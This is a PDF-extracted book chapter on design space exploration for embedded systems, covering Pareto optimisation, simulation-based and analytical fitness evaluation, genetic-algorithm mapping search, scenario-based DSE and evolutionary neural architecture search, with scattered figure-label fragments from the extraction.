San Jose, CA, USA, 1995, pp. 388–392. https://doi.org/10.1109/ICCAD.1995.480145
Synopsys ASIP Designer Web page (2021). https://www.synopsys.com/dw/ipdir.php?ds=asip-
designer
Weiss A (2002) Dhrystone benchmark: history, Analysis, “Scores” and Recommendations: White
paper. Embedded Microprocessor Benchmark Consortium (EEMBC). https://www.eembc.org/
techlit/datasheets/dhrystone_wp.pdf. Accessed 5 Oct 2020
Wolberg G (1990) Digital image warping. Wiley-IEEE Computer Society Press, Los Alamitos
Methodologies for Design Space
Exploration 26
Andy D. Pimentel
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 916
DSE: The Basic Concepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 917
Two Basic Ingredients of DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 919
Y-Chart-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 920
Evaluation of a Single Design Point . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 922
Simulative Fitness Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 922
Analytical Fitness Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 926
Searching the Design Space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 927
GA-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 928
Optimizing GA-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 931
Multi-application Workload Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 932
Scenario-Based DSE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 933
Application Exploration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 937
NAS by Means of Evolutionary Piecemeal Training (EPT) . . . . . . . . . . . . . . . . . . . . . . . . . 937
Conclusion and Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 940
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 942
Abstract
In this chapter, an overview of techniques and methods for the design space
exploration (DSE) of embedded systems is presented. DSE is the critical design
process in which system designs are modeled, evaluated, and, eventually, opti-
mized for the various extra-functional system behaviors, such as performance,
power or energy consumption, and cost. The discussion is organized along the
lines of the two primary elements of DSE, namely, the evaluation of single design
points and the search strategy for covering the design space.
A. D. Pimentel ()
Parallel Computing Systems Group, University of Amsterdam, Amsterdam, The Netherlands
e-mail: [email protected]
Keywords
Introduction
the design process because the considered design choices may heavily influence
the success or failure of the final product. However, the process of DSE also is
highly challenging since the design space that needs to be explored typically is
vast, especially during the early stages of design. For instance, the design space
for exploring different mappings of application tasks to processing resources – and
trying to optimize the mapping for, e.g., system performance or power consumption
– exponentially grows with the number of application tasks and processors in the
system and is known to be an NP-hard problem (Singh et al. 2013). Therefore,
the development of efficient and effective DSE methods has received significant
research attention in recent years. In this chapter, an overview will be provided of
the various aspects involved in DSE of embedded systems.
fi : R m → R 1 (1)
Fig. 1 The design space broken down in solution and objective space
(e.g., using not more than the available number of processors, using a valid mapping
of application tasks to processing resources, etc.), i.e., xi are part of the so-
called feasible set. In the remainder of this discussion, a minimization procedure
is assumed, but without loss of generality, this minimization procedure can be
converted into a maximization problem by multiplying the fitness values yi with −1.
With an optimization of a single objective, the comparison of solutions is
trivial. A better fitness (i.e., objective value) means a better solution. With multiple
objectives, however, the comparison becomes nontrivial. Take, for example, two
different MPSoC designs: a high-performance MPSoC and a slower but much
cheaper one. In case there is no preference defined with respect to the objectives
and there are also no restrictions for the objectives, one cannot say if the high-
performance MPSoC is better or the low-cost MPSoC. A MOP can have even more
different objectives, like the performance, energy consumption, cost, and reliability
of an MPSoC-based embedded system. To compare different solutions in the case of
multiple objectives, the Pareto dominance relation is generally used. Here, a solution
xa ∈ X is said to dominate solution xb ∈ X if and only if xa < xb :
L
G M
H N
B
I
J
C
D E
Dominates H F
Pareto Front f1
some of the solutions are not comparable to H . These solutions are better for one
objective but worse for another.
The Pareto dominance relation only provides a partial ordering. For example,
the solutions A to F of the example in Fig. 2 cannot be ordered using the ordering
relation. Since not all solutions x ∈ X can be ordered, the result of a MOP is not a
single solution but a front of non-dominated solutions, called the Pareto front. A set
X is defined to be a Pareto front of the set of solutions X as follows:
{x ∈ X | xa ∈ X : xa < x}
The Pareto front of Fig. 2 contains six solutions: A − F . Each of these solutions
does not dominate the other. An improvement on objective f1 is matched by a worse
value for f2 . Generally, it is up to the designer to decide which of the solutions
provide the best trade-off.
The search for Pareto optimal design points with respect to multiple design criteria
as targeted by DSE entails two distinct elements (Gries 2004; Pimentel 2017):
1. The evaluation of a single design point using the fitness function(s) regarding all
the objectives in question like system performance, power/energy consumption,
and so on
2. The search strategy for covering and navigating through the design space,
spanned by the decision variables xi (with 1 ≤ i ≤ m), during the DSE process
Figure 3 shows a simple taxonomy for DSE approaches, recognizing the above two
DSE elements as well as different properties of these DSE elements. Please note
that these properties typically cannot be considered in pure isolation as they can be
interdependent and even conflicting with each other. As will be discussed in more
920 A. D. Pimentel
Accuracy
capturing relevant
system properties reliability of result quality
inter-
Speed dependence Convergence
evaluation execution time towards optimum results
Effort Effort
detail later on, there usually exists a trade-off between the accuracy and speed with
which the fitness of single design points can be evaluated. In addition to this, the
various fitness evaluation techniques also differ with respect to the implementation
effort and the capability of evaluating the fitness for a wide range of systems,
involving issues such as modularity, reusability of models, etc.
Regarding the search strategy aspect of DSE, the confidence property denotes
the degree of certainty that the design points returned by the DSE include the true
optimum or, alternatively, how close they are to the true optimum. In many search
algorithms, confidence is obtained by avoiding local optima and ensuring sufficient
design space coverage. Clearly, an exhaustive search in which every single point
in the design space is evaluated and compared would provide a 100% confidence.
However, such exhaustive search is usually prohibited due to the sheer size of the
design space. In those cases, as will be discussed later on, search techniques based
on metaheuristics can be used to search the design space for optimal solutions using
only a finite number of design point evaluations. The convergence property denotes
the speed of evaluating a range of design points and, more specifically, the rate
at which the DSE search algorithm manages to converge to an optimum. Finally,
analogous with the effort property in the case of evaluating a single design point,
the effort for searching the design space refers to the implementation of the search
method and setting its parameters, as well as setting up, running, and evaluating the
results of the exploration experiment.
Y-Chart-Based DSE
Many system-level fitness evaluation and DSE methods and tools in the embedded
systems domain are based on the Y-chart methodology (Kienhuis et al. 2002;
Balarin et al. 1997), which is illustrated in Fig. 4. This implies that these DSE
methods separate application models (or workload models) and architecture models
26 Methodologies for Design Space Exploration 921
Application domain
(Platform) Application
Architecture models
model Mapping
Fitness
Analysis
Fitness
Numbers
while also recognizing an explicit mapping step to map application tasks onto
architecture resources (i.e., bind tasks to processing elements in space and time). In
this approach, an application model – derived from a specific application domain
– describes the functional behavior of an application workload in a timing and
architecture independent manner. An MPSoC (platform) architecture model – which
usually has been defined with the application domain in mind – defines architecture
resources and captures their extra-functional behavior, i.e., behavior in terms of
performance, power consumption, cost, etc. To perform quantitative analysis of
the fitness of a design point, application models are mapped onto the architecture
model under investigation, after which the fitness of each application-architecture
combination can be evaluated. Subsequently, the resulting fitness numbers may
be used by the search algorithm of a DSE process to change the architecture,
restructure/adapt the application(s), or modify the mapping of the application(s).
These actions are illustrated by the light bulbs in Fig. 4.
Essential in this methodology is that an application model is independent from
architectural specifics, assumptions on hardware/software partitioning, and timing
characteristics. As a result, application models can be reused in the exploration
cycle. For example, a single-application model can be used to exercise different
hardware/software partitionings or can be mapped onto a range of architecture
models, possibly representing different MPSoC architecture designs or modeling
the same architecture design at various levels of abstraction. The latter refers to the
gradual refinement of architecture models (e.g., Pimentel et al. 2006; Thompson
et al. 2006). As design decisions are made, a designer typically wants to descend
in abstraction level by disclosing more and more implementation details in an
architecture model. Eventually, such refinement can bring an initially abstract
922 A. D. Pimentel
Methods for evaluating the fitness of a single design point in the design space
roughly fall into one of three categories: (1) measurements on a (prototype)
implementation, (2) simulation-based evaluations, and (3) estimations based on an
analytical model. Each of these methods has different properties with regard to
evaluation time and accuracy. Evaluation of prototype implementations provides
the highest accuracy, but long development times prohibit evaluation of many
design options. Analytical estimations are considered the fastest, but accuracy is
limited since they are typically unable to sufficiently capture particular intricate
system behavior. Simulation-based evaluation fills up the range in between these
two extremes: both highly accurate (but slower) and fast (but less accurate)
simulation techniques are available (see also Chap. 25, “Processor Simulation and
Characterization”). This trade-off between accuracy and speed is very important,
since successful DSE depends both on the ability to evaluate a single design point
and being able to efficiently search the entire design space. As present DSE efforts in
the domain of embedded systems design usually use simulation or analytical models
to evaluate single design points, the remainder of this section will focus on these
methods.
(b)
Communication simulation
Bus-cycle Transaction-level
RTL Cycle-accurate
accurate modeling (TLM)
Fig. 5 Different levels of abstraction for (a) simulating processors and (b) simulating communi-
cation
for example, the design of one specific system component. Performing system-level
DSE is infeasible using RTL simulation.
Raising the level of abstraction, one can simulate system components at the
cycle-accurate level. This means that the system components are simulated on a
cycle-by-cycle basis and, as such, that the simulated system state conforms to
the cycle-by-cycle behavior of the target design. This results in more efficient
simulation as compared to RTL simulation at the cost of a somewhat reduced
accuracy since the system state in between cycles is not accounted for. Cycle-
accurate simulation is a popular technique for simulating microprocessors (see also
Chap. 25, “Processor Simulation and Characterization”): so-called cycle-accurate
instruction set simulation (ISS). These ISS simulators try to capture the cycle-by-
cycle behavior of the micro-architectural components of a microprocessor, such as
the pipeline logic, out-of-order processing, branch predictors, caches, and so on. To
account for power consumption behavior, ISS simulators often use activity-based
power models that accumulate the power consumption of the relevant micro-
architecture components based on their activity ratio. A good example is the widely
used cycle-accurate Gem5 ISS (Binkert and et al.: 2011), which can be extended to
also support area and power predictions using activity-based modeling frameworks
such as CACTI (Thoziyoor et al. 2008) and McPAT (Li et al. 2013). Although these
ISS simulators can be deployed to perform micro-architectural DSE for processor
components, they are generally still too slow for performing full system-scale DSE
of multicore-based embedded systems.
In cycle-accurate ISS simulators, the fetching, decoding, and execution of
instructions are explicitly simulated. To further optimize the speed of such simula-
tors, one could translate the instructions from the target binary to be simulated to an
equivalent sequence of instructions (using static or dynamic just-in-time translation)
that can be executed on the simulation host computer. This so-called binary
translation technique, which is, for example, deployed in the widely used QEMU
924 A. D. Pimentel
simulator (Bellard 2005), aims at reducing the overhead of explicitly simulating the
instruction fetch and decode stages. The translated instruction sequences are often
instrumented with additional code to keep track of the extra-functional behavior
such as timing and power consumption, of the original code as it would have
been executed on the target processor. In some cases, however, ISS simulators
and especially binary translation-based simulators only focus on mimicking the
functional behavior and do not capture the extra-functional behavior of the target
processor. In these cases, they are usually referred to as emulators rather than
simulators.
For simulating communication between system components, one could use
so-called bus-cycle-accurate simulation (Cai and Gajski 2003) to speed up the
simulation process. In this type of simulation, all signals of the communication
bus are modeled explicitly in a cycle-accurate fashion, but this accuracy is only
maintained for the signals on the communication bus and not for the logic around
it. The surrounding components can thus use more abstract timing models.
Raising the abstraction level even further for processor simulation yields so-
called host-compiled simulation (Ceng et al. 2009; Bringmann et al. 2015). In this
technique, the source code of the target program is directly compiled into a binary
program that can run on the host computer. In addition, and similar to the binary
translation technique, the source code can be instrumented with a timing and power
consumption model based on the target architecture. Since this type of simulation
is efficient as it directly executes target programs on the host computer, it is very
suitable for system-level DSE. However, at this level of abstraction, it is difficult to
accurately capture intricate micro-architectural behavior, like pipeline and caching
behavior. Another drawback of this simulation approach is that one needs to have
access to the source code of a target program.
For simulating communications, transaction-level modeling (TLM) (Cai and
Gajski 2003) provides the highest level of abstraction. In TLM, communication
details at the level of signals and protocols are abstracted away by means of
encapsulation into entire transactions between system components. At this level,
the emphasis is more on the functionality of the data transfers, i.e., what data are
transferred to and from what locations, rather than on their actual implementation.
Evidently, the extra-functional behavior in TLM simulation models is also captured
at the level of entire transactions.
The above processor simulation techniques are all execution-driven simulation
methods as they are directly driven by the execution of a program. Alternatively,
there are also trace-driven simulation techniques in which the simulation is driven
by event traces that have been collected through the execution of a program (e.g.,
Butko et al. 2015; Castrillon et al. 2010). These trace events can focus on the
evaluation of specific system elements such as memory access address traces for
cache simulation (Uhlig and Mudge 1997). However, an event trace may also consist
of the full sequence of executed instructions, thereby allowing full, trace-driven
microprocessor simulation for the purpose of performance and/or power estimation.
To optimize for simulation speed, the trace events may also represent computations
26 Methodologies for Design Space Exploration 925
Application model
MP3 encoder Video decoder
Quality
Control Display
Scheduled events
Architecture model
Processor Processor Processor
Memory
known design space that meets the design requirements as best as possible. To
this end, these methods search the design space for optimal solutions using only a
finite number of design point evaluations and can thus handle larger design spaces.
However, there is no guarantee that the global optimum will be found using meta-
heuristics, and therefore the result can be a local optimum within the design space.
Examples of metaheuristics are hill climbing, tabu search, simulated annealing,
ant colony optimization, particle swarm optimization, and genetic algorithms (GA)
(Panerati et al. 2017). In this chapter, the focus will be on methods to navigate
the design space that are based on GA. GA-based DSE has been widely studied
in the domain of system-level embedded design (e.g., Palesi and Givargis 2002;
Madsen et al. 2006; Erbas et al. 2006; Quan and Pimentel 2014; Goens et al.
2016) and has demonstrated to yield good results. Moreover, GAs can be used
in their basic (domain-independent) form or, as will also be explained later on,
with custom extensions that incorporate domain-dependent knowledge in order to
improve search performance even further.
GA-Based DSE
GAs operate by searching through the solution space (spanned by the design
variables/decisions being explored) where each possible solution is encoded as
a string-like representation, often referred to as the chromosome (Beasley et al.
1993). A (randomly initialized) population of these chromosomes is then iteratively
modified by performing a fixed sequence of actions that are inspired by their
counterparts from biology: fitness evaluation and selection, crossover, and mutation.
A fundamental design choice of a GA is the genetic representation of the solution
space, because each of the crossover and mutation steps depends on it. To illustrate
how such a genetic representation could look like, let us use a widely studied DSE
problem in the domain of system-level embedded systems design as an example:
optimizing the mapping of a (set of) concurrent application(s) onto an underlying
(heterogeneous) MPSoC platform architecture (Singh et al. 2013). As a convenient
mapping description for an application with n tasks, a vector of size n is used with
processor identifiers pi , where pi indicates the mapping target of task i:
[p0 , . . . , pi , . . . , pn−1 ]
B C
A E F
D
P0 P1 P2 P3
Mem
Crossover
022130 Parents for Parents Children
Fitness evaluation Uniform
producing
100213 + Selection
offspring
Population One-point
population
Crossover
Update
Two-point
New offspring
with new New
Mutation
offspring
Mutation
genetic
material
Parent Child
(a) (b)
Fig. 7 GA-based mapping DSE: (a) general overview of the GA steps and (b) crossover and
mutation operators
or by deploying so-called elitism. Such elitism involves the combination of the new
offspring with a small number of the best solutions from the original population to
avoid loosing strong solutions.
To provide a small example of the results a GA-based DSE could obtain, some
results are presented of a small-scale case study where the design space consists
of an application with 11 tasks that is to be mapped onto a four-core MPSoC
architecture with a crossbar interconnect (Thompson 2012). The mapping design
space contains more than 4 million design points. Of these design points, 175K are
unique ones since the target platform is a homogeneous, symmetric MPSoC and, as
a consequence, exhibits mapping symmetries. Because of the relatively small design
space, in this particular case, it was also possible to perform an exhaustive search,
allowing a quality evaluation of the GA-based search results. To account for the
stochastic behavior of GAs, all results are averages over 300 GA runs. The fitness
of mapping solutions has been evaluated using the Sesame MPSoC simulation
framework (Pimentel et al. 2006; Erbas et al. 2007) (see also section “Simulative
Fitness Evaluation”). Figure 8 shows the results of the GA-based DSE with
different population sizes (10, 15, 40, or 80 chromosomes), a constant mutation
rate (0.1) and crossover probability (0.9), and a uniform crossover in a so-called P-Q
(probability-quality) plot. Regarding the top part of this plot, the horizontal axis (top
x-axis) represents the quality of the result as a percentile toward the true optimum
(a lower percentile indicates a result closer to the optimum), and the vertical axis
represents the probability of achieving a result with that quality. The straight lines
in the graph represent the theoretically derived probabilities of finding results using
a simple, uniform random search. The 80–95% confidence intervals of the mean
fitness value (execution time in cycles, in this case) of mapping solutions found by
the GA were also computed, averaged over the 300 runs of each GA search. These
Fig. 8 P-Q plot for GA-based DSE with different population sizes
26 Methodologies for Design Space Exploration 931
confidence intervals, shown at the bottom of the graph in Fig. 8, indicate the degree
of certainty (as specified by the confidence level) that the real mean lies within the
confidence interval. The more the confidence intervals for different experiments are
nonoverlapping, the more significant the difference of the mean behavior (which is
clearly the case in the example of Fig. 8). The results from this particular case study
show that the GA-based DSE with the largest population size can find mapping
solutions that are always very close to the real optimum: within the 0.1 percentile,
1000 = 175 solutions. A larger population size,
implying that they belong to the best 175K
however, comes with a higher number of fitness evaluations during the search and
thus requires a longer search time (assuming the number of search iterations remains
constant). According to Fig. 8, a population size of 40 may therefore provide a good
compromise.
There are various methods for making the search process of a GA-based DSE more
efficient. This allows the DSE process to either find the design candidates quicker
(i.e., improve the convergence behavior of the DSE) or to spend the same amount
of time to evaluate more design points. The latter can be used to enable the search
of larger design spaces or to improve the chance of finding better design candidates
(i.e., improve the confidence property of the DSE). One approach for optimizing
the GA-based search is to enrich the genetic operators of the GA with domain
knowledge such that they produce more diverse offspring or offspring with a higher
probability of being closer to the optimum. For example, in Thompson and Pimentel
(2013), new GA operators have been proposed that optimize the search performance
by (1) reducing the redundancy present in chromosome representations (e.g.,
mapping symmetries (Goens et al. 2017) in the case of homogeneous, symmetrical
MPSoC platforms) or (2) using a new crossover operator that is based on a mapping
distance metric that provides a measure of similarity between mappings. Using this
mapping distance information, the new crossover operator aims at retaining the
strong chromosome parts of both of the parents. In Quan and Pimentel (2014), a
new mutation operator has been proposed that considers the affinity of tasks with
respect to processors, the communication cost between tasks, and the differences of
processor workloads to steer the mutation in such a way that offspring is produced
with a higher probability of being (near-)optimal.
Another approach for optimizing GA-based DSE concerns the reduction of
the time taken to evaluate the fitness of solutions during the GA’s execution. As
mentioned before, DSE approaches typically use either simulation or an analytical
model to evaluate the fitness of design points, where simulative approaches prohibit
the evaluation of many design options due to the higher evaluation performance
costs and analytical approaches suffer from accuracy issues. Therefore, in Piscitelli
and Pimentel (2012a), a hybrid form of mapping DSE has been proposed that
combines simulation with analytical estimations to prune the design space in terms
of application mappings that need to be evaluated using simulation. To this end,
932 A. D. Pimentel
the DSE technique uses an analytical model that estimates the expected throughput
of an application given a certain architectural configuration and application-to-
architecture mapping. In the majority of the search iterations of the DSE process,
this analytical throughput estimation avoids the use of simulation to evaluate the
design points. However, since the analytical estimations may in some cases be
less accurate, the analytical estimations still need to be interleaved with simulative
evaluations in order to ensure that the DSE process is steered into the right direction
(Piscitelli and Pimentel 2012b). A similar approach is taken in Mariani et al. (2010),
where an iterative DSE methodology is proposed exploiting the statistical properties
of the design space to infer, by means of an empirical analytic model, the design
points to be analyzed with low-level simulation. The knowledge of a few design
points is used to predict the expected improvement of unknown configurations.
Alternatively, in hierarchical DSE (e.g., Mohanty et al. 2002; Jia et al. 2013,
2014), DSE is first performed using analytical or symbolic models to quickly
find the interesting parts in the design space. Hereafter, simulation-based DSE is
performed on the selected sweet spots in the design space to more accurately search
for the optimal design points.
The DSE techniques discussed so far focus on the evaluation and exploration of
MPSoC architectures under static, single-application workloads. Today’s MPSoC
systems, however, often require supporting an increasing number of applications
and standards, where multiple applications can run simultaneously and concurrently
contend for system resources (Thompson and Pimentel 2007; Castrillon et al. 2013).
For each single application, there may also be different execution modes (or program
phases) with different computational and communication requirements. For exam-
ple, in software-defined radio appliances, a radio may change its behavior according
to resource availability, such as the long-term evolution (LTE) standard which uses
adaptive modulation and coding to dynamically adjust modulation schemes and
transport block sizes based on channel conditions. Or a video application could
dynamically lower its resolution to decrease its computational demands in order to
save battery life. As a consequence, the behavior of application workloads executing
on the embedded system can change dramatically over time.
As illustrated in Fig. 9, there are several approaches for dealing with multi-
application workloads in the context of DSE. A commonly used approach is to
consider the applications in isolation, as illustrated in Fig. 9a. This implies that
each of the applications in the multi-application workload will be mapped to a
different, isolated part of the system. As a consequence, the DSE for each of
these applications can also be performed in isolation. However, this approach
typically leads to overdesigned systems since there is no or limited resource
sharing between applications. Another approach, illustrated in Fig. 9b, makes the
pessimistic assumption that all applications that can be executed on the system
will always be active (and will thus be contending for system resources). Again,
26 Methodologies for Design Space Exploration 933
P1 P2 P3
P1 P2 P3 Scenario
App 0 Database
Mem Mem
P1 P2 P3 App 1
Mem Mem
App 0 App 1
Mem Mem
DSE
DSE
DSE DSE
Select mapping
Select mapping
Exec. time
Exec. time
Select mapping Select mapping
Exec. time
Exec. time
Power
Power
Power Power
P1 P2 P3 P1 P2 P3
P1 P2 P3
Fig. 9 DSE for multi-application workloads on a three-core, bus-based MPSoC: (a) DSE with
application isolation, (b) pessimistic DSE, and (c) scenario-based DSE
performing DSE with such an assumption may lead to highly overdesigned systems,
as in reality the concurrent activation of all possible applications may be unlikely.
To address the problem of overdesigning systems and to capture the dynamism in
application workload behavior during the design process, the DSE could employ
the concept of application scenarios (Gheorghita et al. 2009), leading to scenario-
based DSE (van Stralen and Pimentel 2010a, 2013; Pimentel and van Stralen 2017;
Castrillon et al. 2013). This is illustrated in Fig. 9c. The remainder of this section
will discuss the concepts of application scenarios and scenario-based DSE, again
using the example of application mapping exploration for illustration purposes.
Scenario-Based DSE
video:
+ video:
Simple
Simple
A
Advanced
Simple
=
Active
i
Active mp3:
Mono Sound
mp3: mp3:
Mono Stereo
Active sound sound
three multimedia applications (mp3 player, video decoder, and gsm application)
with each two application modes.
The number of different application scenarios grows exponentially with the
number of applications involved. So, to perform DSE with these application
scenarios, scenario-based DSE needs to solve the problem that the total number
of possible application scenarios is too large to exhaustively evaluate the fitness
of design points with all of these scenarios. Therefore, a small but representative
subset of application scenarios must be selected for the evaluation of MPSoC design
points. This representative subset must be used for comparing mappings and should
lead to the same performance ordering as would have been produced when the
complete set of the application scenarios would have been used. That is, if mapping
m1 is better than mapping m2, the representative subset should be able to give a
better predicted fitness to mapping m1 than it assigns to mapping m2. However,
the selection of such a representative subset is not trivial (Pimentel and van Stralen
2017). This is because the representative subset is dependent on the current set of
mappings that are being explored. Depending on the set of mappings, a different
subset of application scenarios may reflect the relative mapping qualities of the
majority of the application scenarios.
As a result, the representative subset cannot be statically selected. For a static
selection, one would need to have a large fraction of the mappings that are going
to be explored during the MPSoC DSE. However, since these mappings are only
available during DSE, a dynamic selection method must be used. Thus, both the
set of optimal mappings and the representative subset of scenarios need to be
co-explored simultaneously such that the representative subset is able to adapt to
the set of mappings that are currently being explored (van Stralen and Pimentel
2010a, 2013; Pimentel and van Stralen 2017). Figure 11 shows the scenario-
based DSE framework. The left part of the picture provides a general overview
of the exploration flow, whereas the right part illustrates the scenario-based DSE in
more detail. As input, the scenario-based DSE requires a database of application
26 Methodologies for Design Space Exploration 935
Application
Application
Application Architectural
Scenario Model
Model
Model Model
Database mp3 video
Selector
Best
Subset
Processes Channels
Sample
Scenario-Based 00111 20222220 Designs Updater
Parameters
Design Space Subset selector
Exploration 0: CPU-A 0: INTERN
1: CPU-C 1: MEM - 2
2: CPU-E 2: MEM - 3
Candidate Trainer
Designs Sesame Design Explorer
0.045
0.04
0.035
0.03
0.025
1% 4% 8%
Subset Size
HYB GA FS
Fig. 12 Quality of the scenario-based DSE for the different subset selection approaches. The
quality is determined based on the distance between the estimated Pareto front and the optimal
front
quickly exploring the space of potential scenario subsets, but due to its stochastic
nature, it is susceptible to missing the optimal scenario subsets. This is not the case
with the FS algorithm as it more systematically explores the local neighborhood of
a scenario subset.
To give a feeling of the performance of the three different fitness prediction
techniques, Fig. 12 shows the results of a scenario-based DSE experiment in which
the three techniques are compared for three different scenario subset sizes: 1%,
4%, and 8% of the total number of application scenarios. In this experiment, the
mapping of ten applications with a total of 58 tasks and 75 communication channels
is explored. The multi-application workload consists of 4607 different application
scenarios in total. The target platform is a heterogeneous MPSoC with four general-
purpose processors, two ASIPs and two ASICs, all connected using a crossbar
network. In this experiment, a DSE with a fixed duration of 100 min is performed
for all three subset selector approaches. The results have been averaged over nine
runs. To evaluate the fitness of mapping solutions, the Sesame MPSoC simulation
framework (see section “Simulative Fitness Evaluation”) is again deployed. To
determine the efficiency of the multi-objective DSE, the distance of the estimated
Pareto front (execution time versus energy consumption of mapping solutions) to
the optimal Pareto front is obtained. For this purpose, the execution time and energy
consumption are normalized to a range from 0 to 1. As the optimal Pareto front is
not exactly known since the design space is too large to be exhaustively searched,
the combined Pareto front of all performed experiments is used for this.
26 Methodologies for Design Space Exploration 937
The size of the scenario subset provides a trade-off between accuracy and
convergence of the search. That is, a larger scenario subset will lead to a more
accurate fitness prediction of mappings in the design explorer at the cost of a larger
computational overhead to obtain the fitness of a single mapping causing a slower
convergence of the search. This can be seen in Fig. 12. The GA and the FS subset
selection methods have worse results when the subset becomes larger (remember
that a fixed DSE duration of 100 min is used). For a subset size of 4%, the hybrid
selector is, however, still able to benefit from a subset with a higher accuracy. The
slower convergence only starts to effect the efficiency for the 8% subset. Comparing
the different methods, the hybrid method shows the best results. The only exception
is for the 1% subset. In this case, the GA is still able to search the smaller design
space of possible subsets. Still, the result of the hybrid method at 4% is better than
the result of the GA at 1%. With the larger subset sizes, the hybrid method can
exploit both the benefits of the FS and the GA.
Application Exploration
The NAS approach that will be described searches for an efficient convolutional
neural network (CNN) architecture. To this end, it leverages a GA, which allows
a group of candidate CNNs in the GA’s population to train in parallel. In most
NAS techniques, training of a neural network is considered a separate task or a
performance estimation strategy to perform the neural network architecture search.
However, the approach described here considers NAS from a different perspective
as it aims at finding optimal CNN architectures during the training process itself
938 A. D. Pimentel
Evolutionary Operators
The crossover operator in the EPT-based NAS works with two neural networks
and swaps all layers in a gene block of the same type. In this replacement, the
layers being swapped are roughly in the same phase of feature extraction. The input
and output feature map sizes of the layer block being swapped are also identical
26 Methodologies for Design Space Exploration 939
Softmax
FC Softmax Softmax
Softmax FC FC FC
FC FC FC FC
FC Pool Pool FC
in both of the selected networks. Figure 13 illustrates the crossover operator for
swapping convolutional layers from two networks. Crossover is not a function
preserving operator, but in experiments they were found to be important to introduce
diversity in the population by changing the total number of layers in a candidate
through swapping. To reduce the negative effect of training loss incurred due to
the crossover, a cooling-down approach is used to the crossover rate. In earlier GA
iterations, where the training loss is already high, there are more swaps happening
than in the later ones, where training loss is very low.
The mutation operator changes a layer’s parameters such as the number of
kernels or kernel size and is designed to be function preserving. Every mutation
disrupts the ongoing training of the mutated candidates, and some additional loss is
incurred in the training in process. However, due to the function preserving nature
of the mutation operator, the loss incurred from this operator is as small as possible
and recoverable in later piecemeal training.
NAS Results
To illustrate the competence and versatility of the EPT-based NAS concept, a
range of experiments were performed with datasets from two different domains:
CIFAR-10 for image classification (Deng et al. 2009) and PAMAP2 for human
activity recognition (Reiss and Stricker 2012). For CIFAR-10, the search took
940 A. D. Pimentel
2-GPU days, and the best prediction accuracy was found to be 92.5% on the
test set. Table 1 shows comparisons with other evolutionary NAS approaches,
where EPT refers to evolutionary piecemeal training. It may seem that 92.5% is
relatively low compared to other published works, but this is on a very simple and
plain CNN without any architectural enhancements or advance data augmentation.
Other approaches use a hybrid search space where different architecture blocks or
cell modules as well as arbitrary skip connections are used. Instead of stacking
conventional layers, these stack different blocks. The best model found in the
EPT experiments has 13 convolutional layers followed by two fully connected
layers. For the PAMAP2 dataset, the EPT search took only 10 GPU-hours, and the
best prediction accuracy was 94.36%. Compared to state-of-the-art neural network
solutions for this particular dataset, EPT outperforms all other known efforts. The
best performance was found on a neural network that has seven convolutional layers
followed by three fully connected layers. The interested reader is referred to Sapra
and Pimentel (2020a) for a more detailed analysis of EPT’s experimental results.
In this chapter, an overview was presented of techniques and methods for DSE
of embedded systems. The discussion was organized along the lines of the two
primary elements of DSE: the evaluation of single design points and the search
strategy for covering the design space. The overview is certainly not meant to be
exhaustive. For example, the discussion mainly focused on popular GA-based DSE,
optimizing system performance and, to some extent, power/energy consumption.
The optimization of other important design objectives, such as system reliability
(e.g., addressed in Jhumka et al. 2005; Glaß et al. 2007, 2008; van Stralen and
Pimentel 2012), has not been covered.
There are still many open research challenges for this domain. For example,
embedded systems more and more need to become adaptive systems due to
increasingly dynamic application workload behavior (as was previously discussed);
the need for quality-of-service management to dynamically trade off different
system qualities such as performance, precision, and power consumption; and the
26 Methodologies for Design Space Exploration 941
fact that a technology level is reached where digital circuits are no longer fully
reliable, increasing the chances of transient and permanent faults. This calls for
research to take system adaptivity, in which a system can continuously reconfigure
and customize itself at run time according to the application workload at hand
and the state of the system (e.g., Singh et al. 2013; Quan and Pimentel 2015,
2016a,b; Goens et al. 2017; Khasanov and Castrillon 2020), into account in the
process of DSE. In the case of adaptive systems, a DSE process cannot easily
compare different design choices by, e.g., simply evaluating the performance or
power/energy consumption of an application workload executing on a specific
platform architecture. That is, the reconfiguration behavior (i.e., when and how
the system reacts to “disruptive events” that trigger system reconfigurations) of
the system and the performance/power consumption consequences of such system
adaptivity actions must be taken into account when comparing different design
instances. This calls for efficient and effective methods that allow for evaluating
and optimizing adaptive embedded systems designs such that the way the system
instances and their extra-functional behavior evolve over time is also captured.
Another research direction that is worth mentioning involves the introduction of
new design objectives in the process of (early) DSE, in addition to the traditional
objectives such as system performance, power/energy consumption, system cost,
and reliability. Arguably, a good example is the need for taking system security
into account as an optimization objective (Pimentel 2020). As embedded systems
are becoming increasingly ubiquitous and interconnected, they attract a worldwide
attention of attackers, which makes the security aspect more important than ever
during the design of those systems. Currently, system security is still mostly
considered as an afterthought and is typically not taken into account during the
very early design stages. However, any security measure that may eventually be
taken later in the design process does affect the already established trade-offs
